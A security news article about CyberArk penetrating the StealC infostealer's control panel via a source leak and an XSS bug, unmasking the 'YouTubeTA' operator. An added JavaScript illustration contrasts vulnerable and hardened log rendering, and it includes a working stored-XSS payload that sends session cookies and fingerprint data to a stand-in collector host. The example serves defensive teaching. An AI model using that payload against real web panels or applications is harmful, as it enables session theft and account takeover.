- CyberArk exploited StealC control panel via source leak and XSS flaw
- Researchers have exposed the “YouTubeTA” attacker, who stole 390,000 passwords and 30 million cookies.
- The findings could disrupt StealC’s operations by sparking further scrutiny and attacks.
Cybersecurity researchers managed to penetrate the web control panel of information stealer StealC and obtain valuable information about how the malware works, as well as the identities of the attackers and victims.
StealC is an extremely popular infostealer malware that first appeared a few years ago and has since become a staple in the cybercriminal community.
It can collect and exfiltrate sensitive data such as web browser credentials and cookies, system information, data from messaging applications and email clients, and cryptocurrency wallet details, and it offers features such as modular targeting, stealthy execution and flexible command-and-control communications.
Victims of doxxing
CyberArk security researchers found two ways into the control panel: a source code leak that occurred around April 2025, and a cross-site scripting (XSS) vulnerability they discovered in the panel itself.
“By exploiting this vulnerability, we were able to identify characteristics of threat actors’ computers, including general location indicators and details about computer hardware,” the researchers said. “In addition, we were able to retrieve active session cookies, which allowed us to take control of sessions from our own machines.”
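The cookie theft and machine fingerprinting the researchers describe rest on a familiar pattern: a stealer panel renders fields that the infected machine sent (which anyone who can talk to the C2 can forge) into its HTML without encoding, so a crafted "victim" log executes script in the operator's browser. The page does not say which StealC field or page was affected, so what follows is an added illustration, not StealC's or CyberArk's code: a hypothetical log-row renderer in its vulnerable and hardened forms, plus the cookie attribute that blunts the cookie-theft half of the attack. The field names, the collector URL and the cookie name are all assumptions.

```javascript
// Added example, not code from StealC or from CyberArk's research.
// Shows why untrusted stealer-log fields become stored XSS in a C2 panel,
// and the two controls that break the chain: output encoding and HttpOnly.
// All names (fields, URL, cookie) are hypothetical.

// Encode a value for an HTML text or attribute context.
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));

// What a researcher-controlled "victim" would send: a fingerprinting payload
// that reports the operator's session cookie, platform and time zone.
// Hypothetical collector URL; constructed sample.
const payload =
  "fetch('https://collector.example/c?d='+encodeURIComponent(document.cookie" +
  "+'|'+navigator.platform+'|'+Intl.DateTimeFormat().resolvedOptions().timeZone))";

// A log record as the panel would store it. Everything here came from the
// "infected" host, so from the panel's point of view it is attacker-controlled.
const poisonedLog = {
  id: 4711,
  hostname: `DESKTOP-01<img src=x onerror="${payload}">`,
  country: "US",
};

// Vulnerable renderer: raw string interpolation of untrusted fields.
function renderRowVulnerable(log) {
  return `<tr><td>${log.id}</td><td>${log.hostname}</td><td>${log.country}</td></tr>`;
}

// Hardened renderer: every untrusted field is encoded before it reaches the page.
function renderRowSafe(log) {
  return `<tr><td>${escapeHtml(log.id)}</td><td>${escapeHtml(log.hostname)}</td><td>${escapeHtml(log.country)}</td></tr>`;
}

// Crude detector used to compare the two outputs: is there still a live
// <img ... onerror=...> tag in the rendered HTML?
function containsActiveTag(html) {
  return /<img\b[^>]*onerror=/i.test(html);
}

// Second control: a session cookie set with HttpOnly is not visible to
// document.cookie, so the payload above would report an empty cookie jar.
function sessionCookieHeader(sid, { httpOnly = true } = {}) {
  const attrs = ["Path=/", "Secure", "SameSite=Strict"];
  if (httpOnly) attrs.push("HttpOnly");
  return `panel_session=${sid}; ${attrs.join("; ")}`;
}

// Would a browser expose this Set-Cookie value through document.cookie?
function readableByScript(setCookieHeader) {
  return !/;\s*HttpOnly\b/i.test(setCookieHeader);
}

function demo() {
  const vulnerable = renderRowVulnerable(poisonedLog);
  const safe = renderRowSafe(poisonedLog);
  console.log("vulnerable row executes payload:", containsActiveTag(vulnerable));
  console.log("hardened row executes payload:  ", containsActiveTag(safe));
  console.log("cookie readable (HttpOnly):     ", readableByScript(sessionCookieHeader("s1")));
  console.log("cookie readable (no HttpOnly):  ", readableByScript(sessionCookieHeader("s1", { httpOnly: false })));
  return { vulnerable, safe };
}

demo();
```

Encoding at the output point is the fix; HttpOnly is only a backstop. It stops `document.cookie` from leaking the session, but script running in the operator's authenticated page can still issue requests as that operator, so a panel (or any web app) that relies on HttpOnly alone is still fully exposed to an XSS.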
The report details a threat actor, dubbed “YouTubeTA,” who used stolen credentials to log into legitimate YouTube channels and post links that led to the malware. The campaign brought YouTubeTA more than 5,000 victim logs, 390,000 passwords and 30 million cookies.
CyberArk discovered that the attacker was using an Apple M3-based device with English and Russian language settings. The time zone was Eastern European, and on at least one occasion they connected from Ukraine. Cybercriminals usually connect only through a VPN to cover their tracks, but this actor neglected to do so once, revealing an IP address belonging to the Ukrainian ISP TRK Cable TV.
By publishing these findings, CyberArk hopes that StealC will draw attention from other actors, both benign and malicious, and that the added scrutiny will disrupt the entire operation.
Via BleepingComputer